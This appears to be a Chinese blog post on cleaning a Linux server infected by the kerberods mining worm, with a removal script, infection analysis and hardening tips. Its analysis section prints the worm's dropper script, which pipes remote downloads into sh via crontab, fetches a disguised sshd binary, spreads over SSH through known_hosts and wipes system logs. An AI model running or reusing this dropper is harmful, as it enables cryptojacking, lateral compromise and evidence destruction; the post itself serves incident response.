太恐怖了，我的Linux服务器感染了kerberods病毒...

一、症状及表现

1、CPU使用率异常，top命令显示CPU统计数数据均为0，利用busybox 查看CPU占用率之后，发现CPU被大量占用。

注：ls top ps等命令已经被病毒的动态链接库劫持，无法正常使用，大家需要下载busybox。

2、crontab 定时任务异常，存在以下内容；

3、后期病毒变异，劫持sshd，导致远程登陆失败，偶尔还会跳出定时任务失败，收到新邮件等问题

4、存在异常文件、异常进程以及异常开机项

二、查杀方法

1、断网，停止定时任务服务；

2、查杀病毒主程序，以及保护病毒的其他进程；

3、恢复被劫持的动态链接库和开机服务；

4、重启服务器和服务；

附查杀脚本(根据情况修改)

（脚本参考（https://blog.csdn.net/u010457406/article/details/89328869））

1#!/bin/bash2#可以重复执行几次，防止互相拉起导致删除失败34function installBusyBox(){5#参考第一段6busybox|grep BusyBox |grep v7}89function banHosts(){10#删除免密认证，防止继续通过ssh进行扩散，后续需自行恢复，可不执行11busybox echo "" > /root/.ssh/authorized_keys12busybox echo "" > /root/.ssh/id_rsa13busybox echo "" > /root/.ssh/id_rsa.pub14busybox echo "" > /root/.ssh/known_hosts15#busybox echo "" > /root/.ssh/auth16#iptables -I INPUT -p tcp --dport 445 -j DROP17busybox echo -e "\n0.0.0.0 pastebin.com\n0.0.0.0 thyrsi.com\n0.0.0.0 systemten.org" >> /etc/hosts18}192021function fixCron(){22#修复crontab23busybox chattr -i /etc/cron.d/root 2>/dev/null24busybox rm -f /etc/cron.d/root25busybox chattr -i /var/spool/cron/root 2>/dev/null26busybox rm -f /var/spool/cron/root27busybox chattr -i /var/spool/cron/tomcat 2>/dev/null28busybox rm -f /var/spool/cron/tomcat29busybox chattr -i /var/spool/cron/crontabs/root 2>/dev/null30busybox rm -f /var/spool/cron/crontabs/root31busybox rm -rf /var/spool/cron/tmp.*32busybox rm -rf /var/spool/cron/crontabs33busybox touch /var/spool/cron/root34busybox chattr +i /var/spool/cron/root35}3637function killProcess(){38#修复异常进程39#busybox ps -ef | busybox grep -v grep | busybox grep 'khugepageds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null40#busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null41#busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null42#busybox ps -ef | busybox grep -v grep | busybox egrep 'kpsmouseds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null43#busybox ps -ef | busybox grep -v grep | busybox egrep 'kintegrityds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null44busybox ps -ef | busybox grep -v grep | busybox grep '/usr/sbin/kerberods' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null45busybox ps -ef | busybox grep -v grep | busybox grep '/usr/sbin/sshd' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null46busybox ps -ef | busybox grep -v grep | busybox egrep '/tmp/kauditds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null47busybox ps -ef | busybox grep -v grep | busybox egrep '/tmp/sshd' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null48busybox rm -f /tmp/khugepageds49busybox rm -f /tmp/migrationds 50busybox rm -f /tmp/sshd 51busybox rm -f /tmp/kauditds52busybox rm -f /tmp/migrationds53busybox rm -f /usr/sbin/sshd54busybox rm -f /usr/sbin/kerberods55busybox rm -f /usr/sbin/kthrotlds56busybox rm -f /usr/sbin/kintegrityds57busybox rm -f /usr/sbin/kpsmouseds58busybox find /tmp -mtime -4 -type f | busybox xargs busybox rm -rf59}606162function clearLib(){63#修复动态库64busybox chattr -i /etc/ld.so.preload65busybox rm -f /etc/ld.so.preload66busybox rm -f /usr/local/lib/libcryptod.so67busybox rm -f /usr/local/lib/libcset.so68busybox chattr -i /etc/ld.so.preload 2>/dev/null69busybox chattr -i /usr/local/lib/libcryptod.so 2>/dev/null70busybox chattr -i /usr/local/lib/libcset.so 2>/dev/null71busybox find /usr/local/lib/ -mtime -4 -type f| busybox xargs rm -rf72busybox find /lib/ -mtime -4 -type f| busybox xargs rm -rf73busybox find /lib64/ -mtime -4 -type f| busybox xargs rm -rf74busybox rm -f /etc/ld.so.cache75busybox rm -f /etc/ld.so.preload76busybox rm -f /usr/local/lib/libcryptod.so77busybox rm -f /usr/local/lib/libcset.so78busybox rm -rf /usr/local/lib/libdevmapped.so79busybox rm -rf /usr/local/lib/libpamcd.so 80busybox rm -rf /usr/local/lib/libdevmapped.so81busybox touch /etc/ld.so.preload82busybox chattr +i /etc/ld.so.preload83ldconfig84}8586function clearInit(){87#修复异常开机项88#chkconfig netdns off 2>/dev/null89#chkconfig –del netdns 2>/dev/null90#systemctl disable netdns 2>/dev/null91busybox rm -f /etc/rc.d/init.d/kerberods92busybox rm -f /etc/init.d/netdns93busybox rm -f /etc/rc.d/init.d/kthrotlds94busybox rm -f /etc/rc.d/init.d/kpsmouseds95busybox rm -f /etc/rc.d/init.d/kintegrityds96busybox rm -f /etc/rc3.d/S99netdns97#chkconfig watchdogs off 2>/dev/null98#chkconfig --del watchdogs 2>/dev/null99#chkconfig --del kworker 2>/dev/null100#chkconfig --del netdns 2>/dev/null101}102103function recoverOk(){104service crond start105busybox sleep 3106busybox chattr -i /var/spool/cron/root107# 将杀毒进程加入到定时任务中，多次杀毒108echo "*/10 * * * * /root/kerberods_kill.sh" | crontab -109# 恢复被劫持的sshd 服务110#busybox cp ~/sshd_new /usr/sbin/sshd 111#service sshd restart 112echo "OK,BETTER REBOOT YOUR DEVICE"113}114115#先停止crontab服务116echo "1| stop crondtab service!"117service crond stop118#防止病毒继续扩散119echo "2| banHosts!"120banHosts121#清除lib劫持122echo "3| clearLib!"123clearLib124#修复crontab125echo "4| fixCron!"126fixCron127#清理病毒进程128echo "5| killProcess!"129killProcess130#删除异常开机项131echo "6| clearInit! "132clearInit133#重启服务和系统134echo "7| recover!"135recoverOk

查杀完成以后重启服务器，发现过段时间，登陆主机，无论本地还是ssh远程登陆，依然会有病毒进程被拉起，观察top里面的进程，并用pstree 回溯进程之间的关系，发现每次用户登陆就会有病毒进程被拉起，怀疑登陆时加载文件存在问题，逐个排查下列文件：

/etc/profile，

~/.profile，

~/.bash_login，

~/.bash_profile，

~/.bashrc，

/etc/bashrc；

最后终于发现/etc/bashrc 文件被加入了一些似曾相识的语句

删除并次查杀病毒（重复之前查杀步骤），重启服务器，观察一段时间后不再有病毒程序被拉起，至此病毒被查杀完全。

三、病毒分析

1、感染路径

攻击者通过网络进入第一台被感染的机器(redis未认证漏洞、ssh密码暴力破解登录等)。

第一台感染的机器会读取known_hosts文件，遍历ssh登录，如果是做了免密登录认证，则将直接进行横向传播。

2、病毒主要模块

主恶意程序：kerberods

恶意Hook库：libcryptod.so libcryptod.c

挖矿程序：khugepageds

恶意脚本文件：netdns (用作kerberods的启停等管理)

恶意程序：sshd （劫持sshd服务，每次登陆均可拉起病毒进程）

3、执行顺序

① 执行恶意脚本下载命令

② 主进程操作

1> 添加至开机启动，以及/etc/bashrc

2> 生成了sshd文件劫持sshd服务

3> 将netdns文件设置为开机启动

4> 编译libcryptod.c为/usr/local/lib/libcryptod.so

5> 预加载动态链接库，恶意hook关键系统操作函数

6> 修改/etc/cron.d/root文件，增加定时任务

7> 拉起khugepageds挖矿进程

附病毒恶意进程代码

1export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin 2 3 mkdir -p /tmp4chmod1777/tmp56echo"* * * * * (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh"| crontab -78ps -ef|grep-vgrep|grephwlh3wlh44lh|awk'{print $2}'|xargskill-99ps -ef|grep-vgrep|grepCircle_MI|awk'{print $2}'|xargskill-910ps -ef|grep-vgrep|grepget.bi-chi.com|awk'{print $2}'|xargskill-911ps -ef|grep-vgrep|grephashvault.pro|awk'{print $2}'|xargskill-912ps -ef|grep-vgrep|grepnanopool.org|awk'{print $2}'|xargskill-913ps -ef|grep-vgrep|grep/usr/bin/.sshd|awk '{print $2}'|xargs kill -914 ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk'{print $2}'|xargskill-915ps -ef|grep-vgrep|grep"xmr"|awk'{print $2}'|xargskill-916ps -ef|grep-vgrep|grep"xig"|awk'{print $2}'|xargskill-917ps -ef|grep-vgrep|grep"ddgs"|awk'{print $2}'|xargskill-918ps -ef|grep-vgrep|grep"qW3xT"|awk'{print $2}'|xargskill-919ps -ef|grep-vgrep|grep"wnTKYg"|awk'{print $2}'|xargskill-920ps -ef|grep-vgrep|grep"t00ls.ru"|awk'{print $2}'|xargskill-921ps -ef|grep-vgrep|grep"sustes"|awk'{print $2}'|xargskill-922ps -ef|grep-vgrep|grep"thisxxs"|awk'{print $2}'| xargskill-923ps -ef|grep-vgrep|grep"hashfish"|awk'{print $2}'|xargskill-924ps -ef|grep-vgrep|grep"kworkerds"|awk'{print $2}'|xargskill-925ps -ef|grep-vgrep|grep"/tmp/devtool"|awk'{print $2}'|xargskill-926ps -ef|grep-vgrep|grep"systemctI"|awk'{print $2}'|xargskill-927ps -ef|grep-vgrep|grep"sustse"|awk'{print $2}'|xargskill-928ps -ef|grep-vgrep|grep"axgtbc"|awk'{print $2}'|xargskill-929ps -ef|grep-vgrep|grep"axgtfa"|awk'{print $2}'|xargskill-930ps -ef|grep-vgrep|grep"6Tx3Wq"|awk'{print $2}'|xargskill-931ps -ef|grep-vgrep|grep"dblaunchs"|awk'{print $2}'|xargskill-932ps -ef|grep-vgrep|grep"/boot/vmlinuz"|awk'{print $2}'|xargskill-93334cd /tmp35touch /usr/local/bin/writeable && cd /usr/local/bin/36touch /usr/libexec/writeable && cd /usr/libexec/37touch /usr/bin/writeable && cd /usr/bin/38rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable39export PATH=$PATH:$(pwd)40if[ ! -f"/tmp/.XImunix"] || [ ! -f"/proc/$(cat /tmp/.XImunix)/io"]; then41chattr -i sshd42rm -rf sshd43ARCH=$(uname -m)44if[ ${ARCH}x="x86_64x"]; then45(curl --connect-timeout30--max-time30--retry3-fsSL img.sobot.com/chatres/89/msg/20190606/35c4e7c12f6e4f7f801acc86af945d9f.png -o sshd||wget --timeout=30--tries=3-qimg.sobot.com/chatres/89/msg/20190606/35c4e7c12f6e4f7f801acc86af945d9f.png -O sshd||curl --connect-timeout30--max-time30--retry3-fsSL res.cloudinary.com/dqawrdyv5/raw/upload/v1559818933/x64_p0bkci -o sshd||wget --timeout=30--tries=3-qres.cloudinary.com/dqawrdyv5/raw/upload/v1559818933/x64_p0bkci -O sshd||curl --connect-timeout30--max-time30--retry3-fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819210520/7.150351516641309.jpg -o sshd||wget --timeout=30--tries=3-qcdn.xiaoduoai.com/cvd/dist/fileUpload/1559819210520/7.150351516641309.jpg -O sshd) &&chmod+xsshd46else47(curl --connect-timeout30--max-time30--retry3-fsSL img.sobot.com/chatres/89/msg/20190606/5fb4627f8ee14557a34697baf8843dfe.png -o sshd||wget --timeout=30--tries=3-qimg.sobot.com/chatres/89/msg/20190606/5fb4627f8ee14557a34697baf8843dfe.png -O sshd||curl --connect-timeout30--max-time30--retry3-fsSL res.cloudinary.com/dqawrdyv5/raw/upload/v1559818942/x32_xohyv5 -o sshd||wget --timeout=30--tries=3-qres.cloudinary.com/dqawrdyv5/raw/upload/v1559818942/x32_xohyv5 -O sshd||curl --connect-timeout30--max-time30--retry3-fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1559819246800/1.8800013111270863.jpg -o sshd||wget --timeout=30--tries=3-qcdn.xiaoduoai.com/cvd/dist/fileUpload/1559819246800/1.8800013111270863.jpg -O sshd) &&chmod+xsshd48fi49$(pwd)/sshd ||/usr/bin/sshd || /usr/libexec/sshd||/usr/local/bin/sshd|| sshd || ./sshd ||/tmp/sshd||/usr/local/sbin/sshd50fi5152if[ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then53forh in $(grep-oE"\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"/root/.ssh/known_hosts);dossh -oBatchMode=yes -oConnectTimeout=5-oStrictHostKeyChecking=no$h'(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &'& done54fi5556forfile in /home/*57do58iftest -d $file59then60if[ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then61forh in $(grep-oE"\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"$file/.ssh/known_hosts);dossh -oBatchMode=yes -oConnectTimeout=5-oStrictHostKeyChecking=no$h'(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &'& done62fi63fi64done6566echo0>/var/spool/mail/root67echo0>/var/log/wtmp68 echo 0>/var/log/secure69echo0>/var/log/cron70 #

四、安全防护

1.SSH

① 谨慎做免密登录

② 尽量不使用默认的22端口

③ 增强root密码强度

2.Redis

① 增加授权认证(requirepass参数)

② 尽量使用docker版本(docker pull redis)

③ 隐藏重要的命令

太恐怖了，我的Linux服务器感染了kerberods病毒...

你可能感兴趣的:(太恐怖了，我的Linux服务器感染了kerberods病毒...)